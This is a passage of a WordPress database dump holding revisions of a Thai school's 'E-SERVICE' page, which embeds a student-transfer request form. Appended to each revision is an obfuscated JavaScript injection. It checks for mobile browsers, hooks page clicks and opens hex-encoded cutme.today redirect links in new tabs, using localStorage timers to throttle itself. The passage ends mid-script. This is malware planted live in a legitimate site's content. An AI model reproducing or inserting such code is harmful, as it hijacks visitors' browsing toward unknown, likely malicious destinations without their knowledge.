_0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-08 14:59:01','2024-08-08 07:59:01','',459,'http://pakhaeng.ssk.in.th/?p=695',0,'revision','',0),
(696,1,'2024-08-08 14:59:45','2024-08-08 07:59:45','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"882f61c5\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-882f61c5 gb-headline-text\">แบบคำขอการย้ายนักเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p>กรอกข้อมูล ในแบบฟอร์ม ให้ครบถ้วน แล้วทางโรงเรียนจะติดต่อกลับเพื่อ มารับคำขอย้ายโรงเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>หมายเหตุ : กรอกข้อมูลไม่ครบถ้วน ไม่รับพิจารณาขอย้าย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://docs.google.com/forms/d/e/1FAIpQLSfTrFBwCoHyb8ISwfCACpe5sKpc1iodVua4jH3_yiG0DL0AEA/viewform?embedded=true\" width=\"1500\" height=\"1899\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\">กำลังโหลด…</iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-08 14:59:45','2024-08-08 07:59:45','',459,'http://pakhaeng.ssk.in.th/?p=696',0,'revision','',0),
(697,1,'2024-08-08 15:01:05','2024-08-08 08:01:05','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"882f61c5\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-882f61c5 gb-headline-text\">แบบคำขอการย้ายนักเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p>กรอกข้อมูล ในแบบฟอร์ม ให้ครบถ้วน แล้วทางโรงเรียนจะติดต่อกลับเพื่อ มารับคำขอย้ายโรงเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>หมายเหตุ : กรอกข้อมูลไม่ครบถ้วน ไม่รับพิจารณาขอย้าย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://docs.google.com/forms/d/e/1FAIpQLSfTrFBwCoHyb8ISwfCACpe5sKpc1iodVua4jH3_yiG0DL0AEA/viewform?embedded=true\" width=\"1500\" height=\"1200\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\">กำลังโหลด…</iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const 